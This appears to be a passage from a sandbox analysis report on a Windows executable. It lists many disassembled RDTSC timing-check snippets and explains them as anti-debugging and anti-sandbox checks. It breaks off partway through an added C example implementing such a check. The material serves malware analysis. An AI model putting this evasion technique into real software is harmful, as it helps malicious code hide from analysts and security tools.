                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126A8A4 second address: 126A8AE instructions: 0x00000000 rdtsc 0x00000002 je 00007F3FAC81C95Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126A9E1 second address: 126A9F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F3FACC550D6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126A9F7 second address: 126A9FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1275E7E second address: 1275EAE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F3FACC550DAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F3FACC550DDh 0x00000010 push edi 0x00000011 jo 00007F3FACC550DEh 0x00000017 jnc 00007F3FACC550D6h 0x0000001d push edi 0x0000001e pop edi 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127C2EC second address: 127C30B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007F3FAC81C962h 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127C30B second address: 127C30F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128E99A second address: 128E9B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 pushad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jc 00007F3FAC81C956h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12940D4 second address: 1294118 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F3FACC550E3h 0x0000000e pop esi 0x0000000f pushad 0x00000010 push esi 0x00000011 jg 00007F3FACC550D6h 0x00000017 jmp 00007F3FACC550DCh 0x0000001c pop esi 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1294118 second address: 129411C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129411C second address: 1294120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12943EB second address: 12943EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12943EF second address: 12943F9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3FACC550D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1296A91 second address: 1296AA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F3FAC81C956h 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1296AA4 second address: 1296ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F3FACC550D6h 0x0000000a pop edi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jo 00007F3FACC550EAh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1296ABA second address: 1296AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1296AC0 second address: 1296AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 129BC0B second address: 129BC36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3FAC81C95Eh 0x0000000a pushad 0x0000000b jmp 00007F3FAC81C966h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 129B917 second address: 129B921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3FACC550D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 129B921 second address: 129B948 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3FAC81C956h 0x00000008 jmp 00007F3FAC81C95Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F3FAC81C95Eh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 129B948 second address: 129B97D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3FACC550DCh 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007F3FACC550E6h 0x0000000f popad 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 popad 0x00000015 jbe 00007F3FACC550D6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12B8D3B second address: 12B8D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12B8D41 second address: 12B8D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12B8D47 second address: 12B8D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12B8D54 second address: 12B8D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12B8BC8 second address: 12B8BCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12B8BCC second address: 12B8BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12B8BD2 second address: 12B8BD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12B8BD8 second address: 12B8BDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12B8BDD second address: 12B8BE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BAD32 second address: 12BAD36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BAD36 second address: 12BAD3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BAD3C second address: 12BAD68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3FACC550E3h 0x00000009 jmp 00007F3FACC550E5h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BDE77 second address: 12BDE7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BDE7B second address: 12BDE90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3FACC550D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnl 00007F3FACC550DEh 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BF456 second address: 12BF460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F3FAC81C956h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BF460 second address: 12BF466 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BF466 second address: 12BF46B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BF46B second address: 12BF498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FACC550E4h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b jmp 00007F3FACC550E1h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12CFB7B second address: 12CFB8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F3FAC81C95Bh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12CFB8F second address: 12CFBB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a js 00007F3FACC550E4h 0x00000010 jmp 00007F3FACC550DEh 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12CFBB7 second address: 12CFBDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FAC81C960h 0x00000009 popad 0x0000000a jmp 00007F3FAC81C95Dh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12CFBDC second address: 12CFBE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12CE8E3 second address: 12CE8E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12CE8E7 second address: 12CE901 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12CE901 second address: 12CE90C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnc 00007F3FAC81C956h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12CE90C second address: 12CE953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jnp 00007F3FACC5512Eh 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F3FACC550E8h 0x00000015 ja 00007F3FACC550D6h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F3FACC550E4h 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12CEBF0 second address: 12CEC36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F3FAC81C967h 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007F3FAC81C969h 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push edx 0x00000017 pop edx 0x00000018 jo 00007F3FAC81C956h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12CEC36 second address: 12CEC49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F3FACC550DEh 0x0000000b push edi 0x0000000c pop edi 0x0000000d jg 00007F3FACC550D6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12CEDBF second address: 12CEDCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F3FAC81C956h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12CEF52 second address: 12CEF56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12CEF56 second address: 12CEF7A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 je 00007F3FAC81C956h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F3FAC81C956h 0x00000014 jmp 00007F3FAC81C960h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12CEF7A second address: 12CEF84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12CEF84 second address: 12CEF88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12CEF88 second address: 12CEFB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550E9h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnl 00007F3FACC550DEh 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12CF280 second address: 12CF2BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FAC81C969h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push ebx 0x0000000d jmp 00007F3FAC81C967h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12CF3FE second address: 12CF420 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550DEh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3FACC550E0h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12CF420 second address: 12CF424 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12CF55B second address: 12CF55F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12CF55F second address: 12CF584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FAC81C966h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnl 00007F3FAC81C956h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12CF584 second address: 12CF5B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop eax 0x00000008 pushad 0x00000009 jns 00007F3FACC550DEh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3FACC550E3h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12CF5B0 second address: 12CF5BE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12CF5BE second address: 12CF5C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12CF8C0 second address: 12CF8C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12CF8C6 second address: 12CF8CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D2C79 second address: 12D2C90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FAC81C95Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D2C90 second address: 12D2C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D2C95 second address: 12D2CB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3FAC81C965h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D2CB9 second address: 12D2CC6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3FACC550D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D2CC6 second address: 12D2CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FAC81C95Ch 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push esi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D5DD7 second address: 12D5DE1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D5DE1 second address: 12D5DE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D5DE9 second address: 12D5DF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F3FACC550D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D5DF5 second address: 12D5DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D5DF9 second address: 12D5E39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d jmp 00007F3FACC550E9h 0x00000012 push edi 0x00000013 pop edi 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D5E39 second address: 12D5E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3FAC81C956h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D5E43 second address: 12D5E64 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F3FACC550EFh 0x0000000c jmp 00007F3FACC550E3h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D5957 second address: 12D595B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D595B second address: 12D5990 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550DCh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F3FACC550E7h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 jnp 00007F3FACC550D6h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D5990 second address: 12D59BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jno 00007F3FAC81C956h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 jng 00007F3FAC81C986h 0x0000001a push eax 0x0000001b push edx 0x0000001c jc 00007F3FAC81C956h 0x00000022 jmp 00007F3FAC81C95Ch 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D59BE second address: 12D59D6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3FACC550D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F3FACC550E2h 0x00000010 jng 00007F3FACC550D6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4D6033D second address: 4D60343 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4D60343 second address: 4D603F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3FACC550DCh 0x00000009 or eax, 099DF948h 0x0000000f jmp 00007F3FACC550DBh 0x00000014 popfd 0x00000015 push ecx 0x00000016 pop edi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F3FACC550E0h 0x00000022 sub si, BBA8h 0x00000027 jmp 00007F3FACC550DBh 0x0000002c popfd 0x0000002d pushfd 0x0000002e jmp 00007F3FACC550E8h 0x00000033 sbb ah, 00000008h 0x00000036 jmp 00007F3FACC550DBh 0x0000003b popfd 0x0000003c popad 0x0000003d push eax 0x0000003e pushad 0x0000003f mov bl, 21h 0x00000041 jmp 00007F3FACC550E0h 0x00000046 popad 0x00000047 xchg eax, ebp 0x00000048 jmp 00007F3FACC550E0h 0x0000004d mov ebp, esp 0x0000004f jmp 00007F3FACC550E0h 0x00000054 pop ebp 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4D603F6 second address: 4D603FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4D603FA second address: 4D60400 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4D604E0 second address: 4D604FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3FAC81C967h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11EF9E5 second address: 11EFA0C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3FACC550D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3FACC550E9h 0x00000013 rdtsc
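                The rows above all have the same shape: two rdtsc reads separated only by stack-neutral filler (pushad/popad, push and pop of the same register, conditional jumps that land on the next instruction). That is a time-stamp-counter check: the code measures how long the filler takes and treats a delta far above native cost as evidence that it is being single-stepped, emulated or, as here, trapped by the sandbox's instruction interceptor. The C program below is an added example, not code from the report or from file.exe, of that check. The filler loop, the sample count and the 0x1000-tick threshold are choices made for the example (the report does not expose the sample's threshold), and the clock_gettime fallback is only there so the program also builds on non-x86 hosts.

```c
/* Added example: an RDTSC timing check of the kind the interceptor rows record.
 * Not code from the report or from file.exe; filler, sample count and threshold
 * are assumptions chosen for this example. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
static uint64_t read_counter(void) { return __rdtsc(); }   /* the real RDTSC */
#else
#include <time.h>
/* Portability assumption: on non-x86 hosts a nanosecond clock stands in for the TSC. */
static uint64_t read_counter(void) {
    struct timespec ts;
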